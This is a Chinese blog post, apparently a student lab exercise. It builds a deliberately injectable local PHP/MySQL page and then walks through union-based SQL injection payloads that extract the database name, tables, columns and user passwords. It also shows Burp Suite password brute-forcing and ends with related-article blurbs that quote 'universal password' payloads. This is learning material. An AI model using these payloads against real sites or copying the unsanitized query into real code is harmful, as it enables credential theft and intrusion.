mysql 密码注入_简单sql注入与密码爆破

最新推荐文章于 2024-05-15 12:24:32 发布
最新推荐文章于 2024-05-15 12:24:32 发布
阅读量1.3k 收藏 1
点赞数
文章标签: mysql 密码注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42126274/article/details/114795496
版权

简介:Day3的练习题和作业

简单sql注入

(自己搭建一个页面注入)

页面搭建

使用phpstudy,在WWW目录的index.php中进行代码修改

在localhost界面下,即127.0.0.1打开默认显示index.php的页面

该页面有如下要求:

使用Post方法传递参数

链接之前自己已生成的数据库

字符型注入页面,要求是post传递的参数,输入id,显示username,age,sex

代码如下:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

Enter your id:

/*在这之上html代码,实现的文本框输入,使其能够以post方法传递参数*/

if(empty($_POST['id'])) die; // 防止返回错误信息

$id=$_POST['id']; // 接受id表单提交的值

$conn=mysql_connect("127.0.0.1","root","root");//进入mysql 主机,用户名,密码

if($conn){

echo "Connecting is ok!
";

}else{

echo "Connecting is not ok!
";

}

$db_selected = mysql_select_db('ckf',$conn);//该函数可以设置活动的MySQL数据库,相当于选择一个数据库进入

$sql = "SELECT * from ckf where id='$id'";//定义sql语句

$result = mysql_query($sql,$conn);//执行sql语句后返回给result

while($row = mysql_fetch_array($result)){

echo "username: ".$row['username']."
";

echo "sex: ".$row['sex']."
";

echo "age: ".$row['age']."
";

}

/*mysql_fetch_array函数从结果集中取得一行作为数组,返回根据从结果集取得的行生成的数组,如果没有更多行则返回false*/

/*while循环目的是为了遍历数组*/

mysql_close($conn);//关闭数据库

?>

sql注入攻击

1. 判断注入存在与否,判断注入类型

第一幅图

3c16c36d087fdf7e3b5da61070bb3227.png

第二幅图

604a8358f8df5ed630c4eec404c1841d.png

第三幅图

8fe0fb9d52c6ce31647dd5352de852d7.png

由上述三图可以看出,永真式成功,永假式失败,基本可以判定注入存在且为字符型注入

2. 猜解SQL查询语句中的字段数,为后续union select 做准备

图1

87f453c807231a7a67f3b960a79ed98c.png

图2

7d16c0e70ea401390df7dce6e9c66543.png

图3

7b135023374b1486853a3e19b0d8202b.png

可以看出,order by 6成功,order by 7失败

说明执行的SQL查询语句中有六个字段

3. 确定回显字段顺序

ec0add330b401eb85818f1c391188ddf.png

可以看出,返回的是该表的第二、四、五列

4. 获取当前数据库名称

f416d75396b77be621a3895bf52bd0e7.png

具体输入:

1’ union select 1,database(),3,4,5,6 #

当然,database()在4或5位置也可以

因为在第2位置,所以username显示的结果(ckf)就为库名

5. 获取当前数据库中所引用的表名

87385078d1a0fe4923ab4178722d0627.png

具体输入:

1’ union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() #

同理,username显示结果(ckf)就为表名

6. 获取引用表中的字段名称

f69430bbd00f92e32854327c63735be9.png

具体输入:

1’ union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=’ckf’ #

同理,username上显示的信息就为表单所有的字段

7. 得到目标数据password

0ca3ac88197aa2a340e9920ff8c4c324.png

具体输入:

1’ or 1=1 union select 1,2,3,group_concat(id,username),group_concat(password),6 from ckf #

sex一栏为username

age一栏为对应username的password

password.txt 使用Burpsuit爆破密码

1. 右键源码发现最下面有个

9d235d42e657a7543094273e85b096e3.png

怀疑藏有别的目录,于是将password.txt这一字符串替换index.php

44370fb1a630d44ff7c6d95142dbe040.png

发现有许多的字符串,正确密码应该就在其中,将文本复制下来保存

2. Burpsuit截包

随意输入一串密码后点击确认,使用Burpsuit截包

e5ba8283014b8784d3cb12411d73bc3c.png

随后send to intruder

4b38d7c204723278e587547b0346693c.png

修改完需要爆破的参数后Load之前保存下来的密码文本

f8ff679514f812f2a848ea871e2f4262.png

start attack后发现长度不同的即为密码

8216b81626cebb1a3589b3015bb71777.png

zhang james
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用SQL注入漏洞登录后台
zxcvbnmasdflzl的博客
06-19 1万+
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
SQL注入爆库渗透测试(初学者必看)
yi152787的博客
04-30 1923
爆库原理基本一致的,也许站点不同但只要存在sql注入则需要进行数据库爆破,步骤及使用的参数基本相同,对参数不够熟悉的网友可以去某百某博查看相关信息,本次实验结束,本文章仅提供参考,请勿在未授权的情况下进行测试。本次实验利用sqlmap爆破工具对SQL靶场进行渗透测试(数据库爆破),最终目标:拿到用户名和密码,实验中页面出现的用户名密码可忽略,真实实战中一般不会直接爆出用户名和密码的。5.在security爆出users,已确定目标所在,进行第三步爆破 所使用到的参数 -D -T --colimn;
大数据最全Hydra密码爆破工具使用教程图文教程(超详细),字节跳动大数据开发研发岗这些知识点内部泄露出来了
最新发布
2401_84592187的博客
05-15 624
协议对应的服务名和默认密码经常会忘记,下面整理了一些常见的服务爆破格式。这里主要简单介绍一下用法,我知道我的SSH密码,所以就直接指定密码了。我们的密码字典中有三个密码,它也会执行三次,并把执行过程列了出来。但很多时候,我们是不知道密码的,所以就要使用密码字典来爆破爆破其他协议服务时,把协议名和默认用户名换一下就可以了。参数指定密码,后面直接跟目标的IP地址和协议。1)我们先准备一个简单密码字典,创建一个。成功的话,会把账号和密码高亮显示出来。3)如果想看爆破的过程,可以加上。执行的结果都是一样的。
SQL注入与万能密码登录
山兔的博客
10-26 4147
今天的靶机是一个主要面向web应用程序的框架。更具体地说,我们将了解如何对启用了SQL数据库的web应用程序执行SQL注入。我们的目标是具有针对后端数据库的搜索功能的网站,该数据库包含易受此攻击的可搜索项目攻击类型。任何用户都不应该看到此数据库中的所有项目,因此网站将为我们提供不同的搜索结果。SQL 服务通常如何运行的一个很好的例子是用于任何用户的登录过程。每次用户要登录时,Web 应用程序都会将登录页输入(用户名/密码组合)发送到 SQL 服务,并将其与该特定用户的存储数据库条目进行比较。
Burpsuite密码爆破和基础SQL注入(含安装)
qq_45070118的博客
07-30 5495
1.burp suite简介 Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。 1.Target(目标)——显示目标目录结构的的一个功能 2.Proxy(代理)——拦截HTTP/S的代理服务器,作为一个在浏览器和目...
php 数据库 编程,php数据库编程(mysql mysqli pdo)
weixin_29243279的博客
03-26 195
php有三种方式来操作mysql数据库1.mysql扩展库mysqli扩展库pdomysql扩展库和mysql数据库mysql扩展库:已经有方法直接操作数据库mysql数据库:用于存放数据mysql数据库的三层结构示意图使用php的mysql扩展库完成对mysql操作的案例编写一个程序,这个程序从userl表中读取数据,并打印在网页中1.环境搭建1.1启用mysql扩展库在php.ini中进行配置...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
MySql手工注入.doc#资源达人分享计划#
08-12
首先,MySQL手工注入的基本原理是通过构造恶意SQL语句,利用Web应用程序中存在的输入验证不足或完全缺失,来获取数据库中的数据。例如,`information_schema`是一个非常关键的虚拟库,它存储了关于所有数据库、表和...
SQL注入工具Havij
08-04
2. **参数化查询**:使用预编译的SQL语句,将参数与查询语句分开,防止SQL注入。 3. **最小权限原则**:数据库账户应授予最低限度的权限,减少攻击成功后的影响范围。 4. **错误处理**:避免在错误信息中泄露...
Mysql渗透笔记.pdf
01-25
* 确认 SQL 语句使用的列数,确保 union select 语句的列数目与 select 语句的列数目一致。 * 确认什么样的列被输出到页面上。 * 检索数据库的元数据表来获取信息。 * 检索数据库的其他表来获取信息。 获取数据库...
mysql8 攻防技巧.pdf
09-09
MySQL8攻防技巧是数据库管理领域中的一个重要话题,它涵盖了如何保护MySQL服务器免受恶意攻击以及如何防御SQL注入等安全问题。以下是对标题和描述中所述知识点的详细说明: 0x00 MySQL8简介: MySQL8是MySQL数据库...
php连接数据库的两种方式- 面向过程 面向对象
dlqw5802的博客
06-26 291
一、面向对象1. 链接数据库 $conn = @new mysqli("127.0.0.1","root","","mydb"); if($conn->connect_errno){ //返回链接错误号 // 返回链接错误信息 die("数据库链接失败:".$conn->connect_error); } 2. 选择数据库 $conn->select_d...
mysql 密码注入_数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入
weixin_33600816的博客
01-27 593
另类登录注入形式:经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。猜解思路可以构造,user_name: xxx'and password>'a 如果passw...
mysql 密码注入_SQL注入原理——万能密码注入
weixin_32259855的博客
02-18 1546
【万能密码】的原理用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是【Selectuser id,user type,email From users Where user id=’用户名’ And password=’密码’】由于网站后台在进行数据库查询的时候没有对单引号进行过滤,当输入用户名【a...
BP靶场中SQL注入练习
剁椒鱼头没剁椒的博客
01-14 1718
Bp靶场有点类似于常见的DVWA靶场、piachu靶场,里面富含多种不同类型的漏洞,并且每个靶场都有针对性,例如sql注入,从最简单的判断开始,逐步的增加难度,并且每一个靶场都附带介绍以及通过方式,能够让新人快速的了解原理并且针对性练习。
php密码注入,一个PHP登陆注入小示例解决方案
weixin_42298382的博客
03-09 324
一个PHP登陆注入小示例在学学习PHP的过程中肯定会听说过SQL注入简单的讲就是利用后台的SQL代码漏洞来进行一些非法的操作。比如:利用后台代码的漏洞来登陆,用户不用知道真实的用户名和密码也能通过表单提交数据来登陆后台成功。我们拿一个用户验证的例子,首先建立一个数据库和一个数据表并插入一条记录,如下:CREATE TABLE `user` (`userid` int(11) NOT NULL a...
黑客学习-sql注入-二次注入
weixin_49349476的博客
11-24 312
通过二次注入漏洞,把账号更改成我们设置的密码,使能里账号和密码 进行登录
墨者学院SQL注入MySQL)的总结:
weixin_54105551的博客
06-11 464
我们打开靶机在这个界面我们可以看见在密码的下面有一个停机公告,我们点进去,会发现可以发现这个公告是存在id的,又可以会出现漏洞。所以我们尝试着在id=1的后面加上and 1=1我们可以发现and 1=1没有问题,然后我们在输入and 1=2然后我们发现页面没有显示,表示这个地方是存在漏洞的。然后我们在查询一下他的字段数发现没有,然后我们将5去掉我们可以发现,被查询的表中存在4个字段,而且会先是2和3,然后我们开始进行爆破先暴库:我们可以知道他现在用的是上面的这个数据库然后报表:我们使用group_conca
SQL注入之万能密码
热门推荐
Jim的博客
08-18 1万+
万能密码形式:'or'='or'  例如:select * from table where username='' or '=' or '' and password='';   //and优先于or,且'='为真 类似形式还有: "or"a"="a      ')or('a'='a ")or("a"="a 'or 1=1-- "or 1=1-- 'or"=' ‘or’='or
SQL注入攻防手册:MySQL与MSSQL函数与技巧
"这篇文档是关于手工SQL注入的常用语句和技巧的笔记,主要针对MySQL,也涉及了一些MSSQL的相关知识。" 在网络安全领域,SQL注入是一种常见的攻击手段,通过利用应用程序对用户输入数据的不当处理,使得恶意用户能够...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值